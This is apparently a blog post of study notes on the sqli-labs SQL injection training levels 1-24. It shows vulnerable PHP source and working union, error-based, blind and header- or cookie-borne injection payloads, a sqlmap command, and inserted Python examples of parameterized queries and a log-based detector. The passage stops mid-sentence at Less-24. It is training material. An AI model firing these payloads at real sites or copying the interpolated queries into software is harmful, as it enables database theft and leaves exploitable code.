Sqli-labs | iluem'Blog

Sqli-labs

Published: 2020-07-20  Category: Web

Sqli-labs study notes

Reference links

Basic Challenges(1~20)

Less-1

id='$id'

Source logic

# the query is built by interpolating $id into the SQL text
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
# a matching row is echoed back, otherwise the MySQL error is printed
if($row)
{
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
}
else
{
    print_r(mysql_error());
}

Injection techniques

Union-based

?id=0' union select 1,3,(select group_concat(' id:',id,' username:',username,' password:',password) from users)%23

Error-based

?id=0%27or updatexml(1,concat(0x7e,(select concat(id,' ',username,' ',password) from users limit 0,1)),1)%23

bool

?id=0' or ord(substr(database(),1,1))>114%23     //true
?id=0' or ord(substr(database(),1,1))>115%23     //false    

Time-based (using `or` is very slow; the delay scales with the number of rows)

?id=1'and if(ord(substr(database(),1,1))<115,1,sleep(3))%23

sqlmap

python sqlmap.py -u "http://sqli.iluem.xyz/Less-1/?id=1" -p id --dbms=mysql --random-agent -v 3 --auth-type=Basic --auth-cred=user:pass --current-db --technique=U

--technique selects the method: U, E, B or T (union, error, boolean or time-based), matching the sections above.
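The Less-1 source above pastes `$id` straight into the SQL text, which is what every technique in this section relies on. The following is an added example, not code from sqli-labs or from this post: the Less-1 lookup written in Python against an in-memory SQLite database, once with string interpolation as in the lab and once with a bound parameter, so the effect of the union payload can be compared side by side. The sample rows are constructed, and the payload is the Less-1 union payload adapted for SQLite (its `group_concat()` takes one expression, and `#` is not a comment there, so the `-- -` terminator from Less-2 is used).

```python
import sqlite3

# Constructed sample rows standing in for the lab's `users` table (not the lab's data).
SAMPLE_USERS = [
    (1, "alice", "alice-pass"),
    (2, "bob", "bob-pass"),
]

# The Less-1 union payload, adapted for SQLite (assumption): SQLite's group_concat()
# takes a single expression, so the fields are joined with ||, and '#' is not a
# comment in SQLite, so the `-- -` terminator from Less-2 is used instead.
UNION_PAYLOAD = (
    "0' union select 1,3,(select group_concat(username || ':' || password) "
    "from users)-- -"
)


def make_db():
    """In-memory database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_concat(conn, user_id):
    """Mirrors the Less-1 PHP: `id` is pasted into the SQL text, so a quote in the
    input ends the literal and everything after it is parsed as SQL."""
    sql = f"SELECT * FROM users WHERE id='{user_id}' LIMIT 0,1"
    return conn.execute(sql).fetchone()


def lookup_param(conn, user_id):
    """Hardened form: `id` is bound as a parameter. The driver sends it as data,
    so the same payload is compared against the id column as one opaque string."""
    sql = "SELECT * FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (user_id,)).fetchone()


if __name__ == "__main__":
    db = make_db()
    print("concat, id=1    ->", lookup_concat(db, "1"))
    print("concat, payload ->", lookup_concat(db, UNION_PAYLOAD))
    print("param,  payload ->", lookup_param(db, UNION_PAYLOAD))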

Less-2

id=$id

Almost the same as Less-1, but numeric, so not repeated here.

?id=-2 union select 1,(select group_concat(username,'~',password,'~')from users),2; -- -

Less-3

id=('$id')

?id=-2') union select 1,(select group_concat(username,'~',password,'~')from users),2-- -

Less-4

id=("$id")

http://2612018eu6.51vip.biz/sqli-labs/Less-4/?id=-2") union all select 1,2,(select database())-- -

Less-5

id='$id'

The difference from the previous levels is that the query result is no longer echoed.

if($row)
{
    echo 'You are in...........';
}
else
{
    print_r(mysql_error());
}

So union-based injection can no longer be used.

What remains is error-based, boolean and time-based injection, the same as Less-1.

Less-6

id="$id"

Exploited the same way as Less-5.

Less-7

id=(('$id'))

if($row)
{
    echo 'You are in.... Use outfile......';
}
else
{
    echo 'You have an error in your SQL syntax';
    //print_r(mysql_error());
}

Since mysql_error() is commented out here and no error is displayed, only time-based and boolean injection are possible.

?id=1')) and if(ord(substr(database(),1,1))>115,1,sleep(3))%23

Less-8

id='$id'

Same as Less-7: time-based or boolean.

Less-9

id='$id'

if($row)
{
    echo '<font size="5" color="#FFFF00">';
    echo 'You are in...........';
    echo "<br>";
    echo "</font>";
}
else
{
    echo '<font size="5" color="#FFFF00">';
    echo 'You are in...........';
    //print_r(mysql_error());
    //echo "You have an error in your SQL syntax";
    echo "</br></font>";
    echo '<font color= "#0000ff" font size= 3>';
}

The response is identical whether the query succeeds or fails, so only time-based injection works. Same as Less-8.

?id=1' and if(ord(substr(database(),1,1))>115,1,sleep(3))%23

Less-10

id="$id"

Same as Less-9.

?id=1" and if(ord(substr(database(),1,1))>115,1,sleep(3))%23

Less-11

$uname=$_POST['uname'];
$passwd=$_POST['passwd'];
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";

Union, error-based, boolean and time-based injection all work.

# union-based
uname=-1' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database()%23&passwd=123
# error-based
uname=-1' or extractvalue(0x0a,concat(0x0a,(select database())))%23&passwd=123
# boolean
uname=-1'or ord(substr(database(),1,1))>114%23 &passwd=123 //true
uname=-1'or ord(substr(database(),1,1))>115%23 &passwd=123 //false
# time-based
uname=admin' and if(ord(substr(database(),1,1))<115,1,sleep(3))%23 &passwd=123
# Same issue as before: with `or`, if the left-hand side is false the condition is evaluated for every row of the table, so sleep() runs far too many times. Use admin, a username that exists in the table, instead.

Less-12

$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";

uname=1") or 1=1 %23&passwd=123

The usable techniques are the same as Less-11.

Less-13

@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";

#uname=admin') and if(ord(substr(database(),1,1))<115,1,sleep(3))%23 &passwd=123

No data is echoed, but the page differs depending on whether the login succeeded.

So union-based injection can no longer be used; otherwise the techniques are the same as Less-11.

Less-14

Only the quoting differs from Less-13; everything else is the same.

$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";

#uname=admin"and if(ord(substr(database(),1,1))<115,1,sleep(3))%23&passwd=123

Less-15

Error output is commented out, so only boolean and time-based injection remain. The quoting differs from Less-14; otherwise it is the same.

uname=1'or 1=1%23&passwd=123
uname=1'or 2=1%23&passwd=123

Less-16

After a few tries this works:

uname=1")or 1=1%23&passwd=123

Source

$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";

Same as Less-15 with a different quoting; time-based or boolean injection can be used.

Less-17

Starting with this level the input is checked.

function check_input($value)
{
    if(!empty($value))
    {
        // truncation (see comments)
        $value = substr($value,0,15);
    }

    // Stripslashes if magic quotes enabled
    if (get_magic_quotes_gpc())
    {
        $value = stripslashes($value);
    }

    // Quote if not a number
    if (!ctype_digit($value))
    {
        $value = "'" . mysql_real_escape_string($value) . "'";
    }
    else
    {
        $value = intval($value);
    }
    return $value;
}

$uname=check_input($_POST['uname']);
$passwd=$_POST['passwd'];   # not passed through check_input()

@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
    $row1 = $row['username'];
    # the unchecked password is interpolated into a second statement
    $update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
    mysql_query($update);
    if (mysql_error())
    {
        print_r(mysql_error());
    }
    else
    {
        echo " You password has been successfully updated ";
    }
}
else
{
    echo "Bug off you Silly Dumb hacker";
}

This level checks uname, and the SELECT uses uname, so it cannot be exploited there. The exploitable point is the UPDATE statement, which runs as long as uname is valid.

Because an error in the UPDATE is reported, we can construct the following payload

uname=admin&passwd=1' and (select updatexml(1,concat(0x7e,(select database())),1))%23

Time-based injection also works

# time-based
passwd=-1'and if(ord(substr(database(),1,1))<115,1,sleep(0.1))%23%23 &uname=admin

Whether the passwd condition is true or false the page reports success, so boolean injection cannot be used.
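Less-17 is the first level where the lesson is about incomplete mitigation: check_input() escapes uname, but the password flows unescaped into a second statement, and that statement's error message is echoed back. The following added example (not code from sqli-labs or this post) ports check_input() to Python and runs the password-reset flow on SQLite twice, once interpolating passwd as the lab does and once with bound parameters. The sample row is constructed; doubling single quotes is an assumed stand-in for mysql_real_escape_string() because the example runs on SQLite; the payload is the page's own Less-17 payload.

```python
import sqlite3

# Constructed sample row; "admin" is the account the page's payload is sent with.
SAMPLE_USERS = [(1, "admin", "old-pass")]

# The page's own Less-17 payload for the passwd field.
ERROR_PAYLOAD = "1' and (select updatexml(1,concat(0x7e,(select database())),1))#"


def check_input(value):
    """Python port of the lab's check_input(): truncate to 15 characters, then
    either return digits as an integer or return the string quoted and escaped.
    Assumption: doubling single quotes stands in for mysql_real_escape_string()
    because this example runs on SQLite."""
    if value:
        value = value[:15]
    if not value.isdigit():
        return "'" + value.replace("'", "''") + "'"
    return int(value)


def make_db():
    """In-memory database holding the constructed sample row."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def reset_password_concat(conn, uname, passwd):
    """Mirrors Less-17: uname goes through check_input(), but the new password is
    pasted raw into the UPDATE, and a failing UPDATE leaks its error message."""
    sql = f"SELECT username, password FROM users WHERE username= {check_input(uname)} LIMIT 0,1"
    row = conn.execute(sql).fetchone()
    if row is None:
        return "Bug off you Silly Dumb hacker"
    update = f"UPDATE users SET password = '{passwd}' WHERE username='{row[0]}'"
    try:
        conn.execute(update)
    except sqlite3.Error as exc:  # the print_r(mysql_error()) oracle
        return f"error: {exc}"
    return "You password has been successfully updated"


def reset_password_param(conn, uname, passwd):
    """Hardened form: both statements take bound parameters, so check_input() is
    not needed and the UPDATE cannot fail on attacker-controlled syntax."""
    sql = "SELECT username, password FROM users WHERE username=? LIMIT 0,1"
    row = conn.execute(sql, (uname,)).fetchone()
    if row is None:
        return "Bug off you Silly Dumb hacker"
    conn.execute("UPDATE users SET password = ? WHERE username=?", (passwd, row[0]))
    return "You password has been successfully updated"


def stored_password(conn, uname):
    """Current password value for a user (None if the user does not exist)."""
    row = conn.execute("SELECT password FROM users WHERE username=?", (uname,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print(reset_password_concat(db, "admin", ERROR_PAYLOAD))
    print(reset_password_param(db, "admin", ERROR_PAYLOAD), "->", stored_password(db, "admin"))
```

With interpolation the UPDATE fails to parse and its error text is returned to the caller, which is exactly the channel the page's updatexml payload uses; with bound parameters the same string is simply stored as the new password. Note that check_input() also silently truncates input to 15 characters, so even the "checked" field changes the data the application stores.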

Less-18

Key points

  • $_SERVER['HTTP_CLIENT_IP'] can be forged by the client.
  • $_SERVER['HTTP_X_FORWARDED_FOR'] can be forged by the client.
  • $_SERVER['REMOTE_ADDR'] cannot be forged by the client.

This level uses the last one to obtain the IP, so it cannot be forged.

Rough source logic

$uagent = $_SERVER['HTTP_USER_AGENT'];
$IP = $_SERVER['REMOTE_ADDR'];
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
if($row)   # login succeeded
{
    echo 'Your IP ADDRESS is: ' .$IP;
    # the raw User-Agent is interpolated into the INSERT
    $insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
    mysql_query($insert);
    echo 'Your User Agent is: ' .$uagent;
    print_r(mysql_error());
}
else
{
    print_r(mysql_error());
    echo "Try again looser";
}

In this level both uname and passwd are filtered, so the only injection point is the INSERT; since the IP cannot be controlled, it has to go through the User-Agent.

The final request looks like this

POST /sqli-labs/Less-18/ HTTP/1.1
Host: 2612018eu6.51vip.biz
Content-Length: 20
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: 'or updatexml(1,concat(0x7e,(select database())),1),123,123)-- -
Origin: http://2612018eu6.51vip.biz
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://2612018eu6.51vip.biz/sqli-labs/Less-17/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,fi;q=0.8
Connection: close

passwd=admin&uname=admin

The payload is

'or updatexml(1,concat(0x7e,(select database())),1),123,123)-- -

Because error reporting is enabled, error-based injection is the simplest option; time-based injection also works

'or if(ord(substr(database(),1,1))>114,1,sleep(2)),123,123)-- -
'or if(ord(substr(database(),1,1))>115,1,sleep(2)),123,123)-- -

Less-19

The source is roughly as follows

$uagent = $_SERVER['HTTP_REFERER'];
$IP = $_SERVER['REMOTE_ADDR'];
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
if($row)   # login succeeded
{
    # the raw Referer is interpolated into the INSERT
    $insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
    mysql_query($insert);
    print_r(mysql_error());
}
else
{
    print_r(mysql_error());
}

Almost identical to Less-18, except that the injection point is now the Referer

' or updatexml(1,concat(0x7e,(select database())),1),123)-- -

Time-based blind injection is also possible

'or if(ord(substr(database(),1,1))>115,1,sleep(2)),123)-- -

Less-20

if (no uname in the cookie)
    if(isset($_POST['uname']) && isset($_POST['passwd']))
        $uname = check_input($_POST['uname']);
        $passwd = check_input($_POST['passwd']);
        $sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
        ···
else
    if(!isset($_POST['submit']))
        $cookee = $_COOKIE['uname'];
        $sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
        if (the query returned nothing)
            die('Issue with your mysql: ' . mysql_error());
        else
            echo 'Your Login name:'. $row['username'];
            echo 'Your Password:' .$row['password'];
            echo 'Your ID:' .$row['id'];
        ···

The code is long but the logic is simple: uname and passwd still cannot be injected, but setting uname in the cookie is easy to inject, just like Less-1. Every technique works.

Union-based

uname=' union select 1,3,(select group_concat(' id:',id,' username:',username,' password:',password) from users)-- -

Error-based

uname=' or updatexml(1,concat(0x7e,(select database())),1)-- -

Time-based blind

uname='or if(ord(substr(database(),1,1))<115,1,sleep(0.2))%23

Boolean-based blind

uname=' or ord(substr(database(),1,1))>114%23  
uname=' or ord(substr(database(),1,1))>115%23

Advanced Injections (21~38)

Less-21

From the source this is almost identical to Less-20; the only difference is

$cookee = $_COOKIE['uname'];
$cookee = base64_decode($cookee);
$sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";

So the payload just needs to be base64-encoded

Union-based

uname=JykgdW5pb24gc2VsZWN0IDEsMiwoc2VsZWN0IGdyb3VwX2NvbmNhdCgnIGlkOicsaWQsJyB1c2VybmFtZTonLHVzZXJuYW1lLCcgcGFzc3dvcmQ6JyxwYXNzd29yZCkgZnJvbSB1c2VycyktLSAt

Error-based

uname=Jykgb3IgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBkYXRhYmFzZSgpKSksMSktLSAt

Boolean-based

uname=Jykgb3Igb3JkKHN1YnN0cihkYXRhYmFzZSgpLDEsMSkpPjExNC0tIC0=
uname=Jykgb3Igb3JkKHN1YnN0cihkYXRhYmFzZSgpLDEsMSkpPjExNS0tIC0=

Time-based

uname=JylvciBpZihvcmQoc3Vic3RyKGRhdGFiYXNlKCksMSwxKSk8MTE1LDEsc2xlZXAoMC4yKSkj

Less-22

The difference from Less-21 is

$cookee = $_COOKIE['uname'];
$cookee = base64_decode($cookee);
$cookee1 = '"'. $cookee. '"';
$sql="SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1";

Essentially the same; only the concatenation differs

uname="union select 1,3,(select group_concat(' id:',id,' username:',username,' password:',password) from users)-- -
# after base64 encoding
uname=InVuaW9uIHNlbGVjdCAxLDMsKHNlbGVjdCBncm91cF9jb25jYXQoJyBpZDonLGlkLCcgdXNlcm5hbWU6Jyx1c2VybmFtZSwnIHBhc3N3b3JkOicscGFzc3dvcmQpIGZyb20gdXNlcnMpLS0gLQ==

Everything else is the same, so skipping it
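Less-18 through Less-22 move the injection point out of the form fields and into request parts the application later writes to the database: the User-Agent, the Referer, and a cookie that is base64-decoded before use. A detection rule that only inspects query strings and POST bodies misses all three, and one that inspects cookies without decoding them misses the Less-21/22 variant. The following added example (not code from sqli-labs or this post) is a small Python scanner that runs over constructed access-log lines, URL-decodes query and Referer, and tries a base64 decode of every cookie value before matching. The log format, the sample lines and the indicator patterns are assumptions; the payload strings inside the sample lines are the ones shown on this page.

```python
import base64
import binascii
import re
from urllib.parse import unquote, unquote_plus

# Assumed log format: combined log format plus a trailing quoted cookie field.
# Adjust LOG_RE to the format your own server writes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" '
    r'"(?P<ua>[^"]*)" "(?P<cookie>[^"]*)"$'
)

# Indicators for the four techniques this page walks through (first match wins).
INDICATORS = [
    ("error-based", re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I)),
    ("time-based", re.compile(r"\bsleep\s*\(", re.I)),
    ("union-based", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("boolean", re.compile(r"['\"]\s*or\s+(\d+\s*=\s*\d+|ord\s*\()", re.I)),
]

# Constructed sample log lines (IPs, times and sizes are made up).
SAMPLE_LOG = [
    '10.0.0.5 - - [20/Jul/2020:10:00:01 +0000] "GET /sqli-labs/Less-1/?id=1 HTTP/1.1" 200 812 "-" "Mozilla/5.0" "-"',
    '10.0.0.5 - - [20/Jul/2020:10:00:02 +0000] "GET /sqli-labs/Less-1/?id=0%27or%20updatexml(1,concat(0x7e,(select%20database())),1)%23 HTTP/1.1" 200 640 "-" "Mozilla/5.0" "-"',
    '10.0.0.5 - - [20/Jul/2020:10:00:03 +0000] "POST /sqli-labs/Less-18/ HTTP/1.1" 200 512 "http://2612018eu6.51vip.biz/sqli-labs/Less-17/" "\'or updatexml(1,concat(0x7e,(select database())),1),123,123)-- -" "-"',
    '10.0.0.5 - - [20/Jul/2020:10:00:04 +0000] "POST /sqli-labs/Less-19/ HTTP/1.1" 200 512 "\'or if(ord(substr(database(),1,1))>115,1,sleep(2)),123)-- -" "Mozilla/5.0" "-"',
    '10.0.0.5 - - [20/Jul/2020:10:00:05 +0000] "GET /sqli-labs/Less-21/ HTTP/1.1" 200 700 "-" "Mozilla/5.0" "uname=Jykgb3IgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBkYXRhYmFzZSgpKSksMSktLSAt"',
]


def classify(text):
    """Return the first matching technique label for a decoded field, or None."""
    for label, pattern in INDICATORS:
        if pattern.search(text):
            return label
    return None


def maybe_base64(value):
    """Decode a base64 cookie value the way Less-21/22 do; None if not base64."""
    try:
        raw = base64.b64decode(value + "=" * (-len(value) % 4), validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-8", errors="replace")


def candidate_fields(m):
    """Yield (field_name, decoded_text) for every request part a client controls."""
    request = m.group("request")
    path = request.split(" ")[1] if " " in request else request
    yield "query", unquote_plus(path)
    yield "referer", unquote_plus(m.group("referer"))
    yield "user-agent", m.group("ua")
    for pair in m.group("cookie").split(";"):
        name, _, value = pair.strip().partition("=")
        if not name:
            continue
        yield f"cookie:{name}", unquote(value)
        decoded = maybe_base64(unquote(value))
        if decoded:
            yield f"cookie:{name}(base64)", decoded


def scan_line(line):
    """(field, label) for the first flagged part of one log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    for field, text in candidate_fields(m):
        label = classify(text)
        if label:
            return field, label
    return None


def scan_log(lines):
    """One (line_number, field, label) tuple per flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        hit = scan_line(line)
        if hit:
            hits.append((n, hit[0], hit[1]))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The scanner flags the query-string, User-Agent, Referer and decoded-cookie payloads and leaves the benign first line alone. The patterns are deliberately narrow (function names followed by a parenthesis, `union ... select`, a quote followed by `or` and a tautology) to keep false positives down on ordinary traffic; treat them as a starting point for alerting, not as a substitute for parameterized queries in the application.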

Less-23

The level finally changes significantly

if(isset($_GET['id']))
{
    $id=$_GET['id'];
    $reg = "/#/";
    $reg1 = "/--/";
    $replace = "";
    $id = preg_replace($reg, $replace, $id);
    $id = preg_replace($reg1, $replace, $id);
}
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
if($row)
{
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
}
else
{
    print_r(mysql_error());
}

Since the comment characters are filtered, just close the quote instead

Like Less-1, every technique works

Union-based

?id=' union select 1,(select group_concat(' id:',id,' username:',username,' password:',password) from users), '

Error-based

?id=0%27or updatexml(1,concat(0x7e,(select concat(id,' ',username,' ',password) from users limit 0,1)),1) or '

bool

?id=0' or ord(substr(database(),1,1))>114 or '   //true
?id=0' or ord(substr(database(),1,1))>115 or '     //false    

Time-based (using `or` is very slow; the delay scales with the number of rows)

?id=1'and if(ord(substr(database(),1,1))<115,1,sleep(3)) and '1

Less-24

This is a classic second-order injection; let's analyse the source

  • index.php

[screenshot of the index.php source]

The main page mostly records the form data, and the user input is filtered, so there is no sensitive operation there.

Besides the normal login there are the following two functions

  • Forgot password: clicking it shows a message saying that if you have forgotten your password, Go
